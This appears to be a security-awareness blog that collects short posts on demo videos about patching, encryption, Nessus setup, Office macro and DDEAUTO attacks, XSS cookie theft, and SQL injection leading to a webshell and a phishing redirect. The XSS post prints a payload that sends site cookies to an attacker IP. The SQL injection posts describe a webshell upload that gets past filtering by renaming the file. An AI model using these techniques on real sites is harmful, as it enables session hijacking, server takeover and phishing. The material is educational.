The importance of updating

Another quick video to show just how quickly a server can be compromised and taken over completely by an attacker.

In this video we have a server running an out of date and un-patched application, which gives the attacker a way onto the server. Then the attacker dumps and cracks the password hashes, which gives persistent remote (using ssh) access to the system. The attacker can then continue to access the server for whatever purpose they wish

Then the attacker changes the root (admin) password potentially resulting in no one else having admin access to the system. Allowing them to hold the system to ransom or threatening to take it off line to disrupt the business function, or continue to search and remove data unhindered.

This all happens in under 4 minutes. Always stay as up to date with versions and patches as possible.

The Importance of Encryption. Simple Demo

This is a quick video which shows in a very basic way how important encryption is. It is important to practice defense in depth, so even if an attacker manages to gain persistence on your network and is able to “man-in-the -middle” your network connections, encryption gives another layer of protection meaning communication is not in clear text, preventing login credentials being captured.

It’s important remember, that just because an attacker has gained a foothold, does not mean they can stay there or actually do anything. It standard user permissions are well controlled, then the attacker will need to elevate their privileges. One way of doing this is capturing passwords.

The more steps an attacker needs to take to carry out their intended actions to more chance you will have to hopefully detect them on the netywork.

Here we simulate an IT engineer logging in a server terminal session, and showing how encryption protects the connection compared to telnet which communicates in clear text.

How To Install Nessus Vulnerability Scanner

In our previous post we showed how to download and verify the hash of the Home edition of Nessus, and here we will show how to install, setup and run your first scan. This is a very basic setup to get you up and running quickly with the free version of Nessus. If you are going to be using in a live production environment, don’t use this guide.

If you have not read the initial post go here then come back.

You should be where we left off which is just after checking our hash and confirming against the checksum as below

Get used to running the “ls” cmd to check the directory you are in and that you have access to the correct files.

We “ls” to check as mentioned above then use “dpkg -i” which will de-package and then install Nessus.

While that runs and installs we need to go back to tenable.com and get an activation code.

Fill in the details and wait for your email with the activation code.

Go back to your Terminal where the install should now have completed. Check the Window for errors and if there are none we are good to continue.

Run the following “/etc/init.d/nessusd start”

Nessus is now running, so open a browser on the same machine and go to https://localhost:8834 and you should get the login screen.

Create a Username and a Password to login  for the first time (don’t forget these!) and you will get the activation page.

Leave the scanner type, and enter your activation key which you will have received by email.

If correct you will see the next screen, now is the time to make a coffee as this stage may take some time as Nessus sets up.

Once completed you will see the “New Scan” screen.

Select New Scan as shown, then select “Basic Network Scan”. This will allow us to do a basic scan of our internal home network.

We will need to find out the IP of our network for the next step, the easiest way to do this is to use either “ifconfig” on a Linux box or “ipconfig” on a Windows box. Run this from a Terminal Window and make a note of your ip address. (This is a simple step so if unsure how to do it you really shouldn’t be installing Nessus to be honest!)

Name and description can be whatever you want, but the IP Address in the targets box needs to be the IP address you want to scan. In the example it shows “192.168.0.0-255” which means that we are going to scan every address on our network. The scan an individual host you would use a single address, for example “192.168.0.5”. Now save as shown below and you’ll go back to the main page.

To start your scan click the chevron, as outlined below, then wait for your scan to complete.

Once the scan completes, the real fun starts!

DDEAUTO Opens Webpage

We have already posted about DDEAUTO, but thought we’d show another one just as it’s slightly different.

If a document opens and you are greeted by a pop up of any kind, then I’d say 99 times out of a hundred, it’s going to be a malicious exploit and you should just close and delete the document immediately and run a full Anti-Virus scan with at least 3 different free scanners.

Then 2 weeks later re-run all the scans again.

The DDEAUTO Exploit in all Microsoft Office Documents

This is the new exploit which is everywhere at the moment.

It’s a little different to the typical Macro exploits which are normally used.

In general you will need to click on 2 pop ups to allow the exploit to run, however since writing this I have played around a bit more and managed to get it down to only one pop up.

The point here in this video however is to show that if you read what the pop up says, you should not be clicking on it in any circumstances.

It’s true that some documents are linked dynamically to keep all data in linked sheets up to date. However if you are using one of these you would normally know about it.

If you don’t normally use documents with linked data and you open one which asks you to allow linked data, don’t just click OK! If you know who sent it, ask them what it is, and if you don’t know where it came from you probably should even be opening the attachment in the first place!

Then after clicking yes to the first pop up, we receive a second one, this is generally where the exploit will run. Ours is very obviously named for the sake of this demonstration, but an attacker would be trying their best to disguise it.

We hope that by watching this video you will be a little bit more educated and perhaps won’t click on that pop up box if you receive one of these emails!

Enjoy the Video.

Excel Malicious Macro Attachment

Hello again.

It’s 2017 and we are still enabling Macros in documents we receive via email! (Come on people!)

Anyways, there are still people out there who don’t believe a macro can be used this way, so here is a quick video you can show them.

In this short clip a user receives an email from Jerry.random@uk-company.com, but you can clearly see it actually came from a gmail address, and it contains an Excel invoice attachment.

In this example we have Excel set to not allow Macros to run automatically, but we are aware that a lot of people don’t use this setting (you nut-cases!).

Notice that nothing happens until the Macro is enabled!

Don’t enable a macro unless you are 100% sure of what it is.

The Excel sheet contains a simple macro which opens IE and goes to a website. This demonstrates how easy it is for an attacker to use a macro to either install malware or ransomware.  We have used this method in our demo as it is very quick and visual and seems to get the point across better than a more complicated example.

Fake URL in Email

IT’s 2017 and we are still clicking on links in emails!

This is a quick video to demonstrate how a link in an email displaying one address can take you somewhere completely different!

We’re going to follow this up with some videos showing malicious attachments.

Don’t trust emails!

XSS Cookie Steal

Here we demonstrate why you should be filtering any user input.

This shows how easy it is for an attacker to plant some malicious code on a site and steal the admin login credentials (Or another user), by using Cross-Site-Scripting. There is a great explanation on OWASP’s website.

First we test the text areas for correct input validation and when we find it is not being correctly checked we then look to exploit that flaw.

By enclosing the following in script tags “document.write(‘<img src=”http://192.168.56.104/?’+document.cookie+’ “/>’);” we can send the stolen cookies to our PC and then reuse them on the site to gain access to the admin panel and from there we can add  malicious code, create new users or look to get root access on the server.

The site is on 192.168.56.103 and our attacking machine is on 192.168.56.104.

To demostrate this we are using the “XSS and MySQL File” VM from Pentesterlab.com

SQL Injection to URL Redirect Part 2

In this video we start off by using “wget” to clone the site we are attacking so when users are redirected to our site they are less suspicious as any differences are subtle, and wont generally be noticed by normal users. Then we load the cloned pages on our webserver.

For the purpose of the demo we have left the IP address showing in the address bar so you can see the difference. The original site is on .105 and our clone is on .104 (Poisoning the host file or typo-squatting is a whole tutorial by itself).

Back to the hack. We have enough access that if we wanted to we could upload our own pages and replace the existing ones, but for the purpose of this we are going to change where the login URL points to so it sends users to our clone site rather then the correct login page.

We could obviously do this with every link on the site. We could also just upload some further malicious code to the server so that every visitor to the site will have their browser injected with malicious code.

SQL Injection to URL Redirect Part 1

Today we are going to show how an attacker can leverage SQL Injection to redirect users to their own site/webpage for whatever malicious activity they choose.

This will be in two parts. The first will show how using a tool called sqlmap we can carry out successful SLQ Injection, and very quickly dump usernames and passwords. The “php?id=1” part of the URL is injectable, and this is what sqlmap will exploit.

Then once we have access to the admin section, we upload our php shell, but the site has some basic filtering so we change the filename and extension from “b374k-2.8.php” to “b374k-2.8 (copy).jpg.phtml” which gets us past the filtering controls. It also shows why even in password protected areas of your site you still need rubust upload controls. It means if someone manages to access the area they will still have to work to be able to upload a shell. Always think security in depth. Always add layers.

This video ends with us logging into the uploaded webshell and accessing the www directory.